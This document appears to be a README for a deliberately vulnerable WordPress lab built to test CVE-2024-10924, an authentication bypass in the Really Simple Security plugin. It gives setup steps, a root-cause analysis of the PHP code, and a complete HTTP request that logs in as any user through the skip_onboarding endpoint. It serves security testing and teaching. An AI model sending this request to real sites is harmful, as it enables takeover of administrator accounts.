## https://sploitus.com/exploit?id=725FCD01-CB3A-511F-BD5D-EE9E1019BF58
# wordpress-really-simple-security-authn-bypass-vulnerable-application
This is a vulnerable application to test the exploit for the **Really Simple Security** < 9.1.2 authentication bypass (CVE-2024-10924).
## WARNING!
**This application contains serious security vulnerabilities. Run it at your own risk! It is recommended using a backed-up and sheltered environment (such as a VM with a recent snapshot and host-only networking). Do not upload this application to any Internet facing servers, as they will be compromised.**
***DISCLAIMER*: I do not take responsibility for the way in which any one uses this application. The only purpose of this application is to be a test scenario for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924) exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility, it is the responsibility of the person(s) who uploaded and installed it.**
## Vulnerability info
* **CVE-ID**: CVE-2024-10924
* **Link**: [https://vulners.com/cve/CVE-2024-10924](https://vulners.com/cve/CVE-2024-10924)
* **Description**: This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "*Two-Factor Authentication*" setting is enabled (disabled by default).
* **Fix:** [https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl](https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl)
* **Wordfence bulletin:** [https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass](https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass)
## Usage
Here the steps to **setup** the environment:
1. Launch `./up.sh` to start composition.
2. Complete the installation of WordPress here: [https://localhost:1337/wp-admin/install.php](http://localhost:1337/wp-admin/install.php).
3. Login into WordPress.
4. Go to "*Plugins*": [https://localhost:1337/wp-admin/plugins.php](http://localhost:1337/wp-admin/plugins.php).
5. Click on "*Activate*" under the "*Really Simple Security*" plugin. **DO NOT UPDATE IT**, since we need the vulnerable version.
6. Click on "*Cancel*" on the popup referring to SSL activation.
7. Go to "*Settings*" > "*Login Protection*" > "*Two-Factor Authentication*" and, in the "*Two-Factor Authentication*" section, enable "*Enable Two-Factor Authentication*".
8. Click the "*Save*" button.
The container will be called `vuln-wp-really-simple-security`.
To **teardown** the environment use `./down.sh` command or `./down_and_delete.sh` command to also remove images and the volume of the database.
## Root cause
Having a look at the [fix](https://github.com/Really-Simple-Plugins/really-simple-ssl/commit/33b6bae321f437f5d822e7d7e03103915530c86c#diff-826cac126398ce784274642e7be5f5214f94d72e6ae8ee07303b5d485587fdce), it's possible to understand that in the vulnerable version an error object was returned, in case of invalid login nonce, by the `check_login_and_get_user()` function, without aborting the whole operation.
```php
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
}
/**
* Get the user by the user ID.
*
* @var WP_User $user
*/
$user = get_user_by( 'id', $user_id );
return $user;
}
```
In the caller, by the way, no check was performed on the output of the `check_login_and_get_user()` function ([line 277](https://github.com/Really-Simple-Plugins/really-simple-ssl/blob/eb1ac89afa36661bfbb1992edc930fe809a9c88d/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277)), but simply going further with the `authenticate_and_redirect()` function ([line 278](https://github.com/Really-Simple-Plugins/really-simple-ssl/blob/eb1ac89afa36661bfbb1992edc930fe809a9c88d/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278)) using the same value received from input for the user ID.
```php
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
$parameters = new Rsssl_Request_Parameters( $request );
// As a double we check the user_id with the login nonce.
$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}
```
## Exploit
To exploit the vulnerability, a request like the following is sufficient.
```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
Then setting accordingly the returned session cookies in the browser.
The `user_id` must be the ID of the target user, the `login_nonce` can be anything since a wrong value won't block the process.
An exploit script in Python can be found [here](https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit).
## Authors
* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)
## License
This project is licensed under the Unlicense - see the **LICENSE** file for details.
## Acknowledgments
* [**István Márton**](https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass), the security researcher who discovered the vulnerability.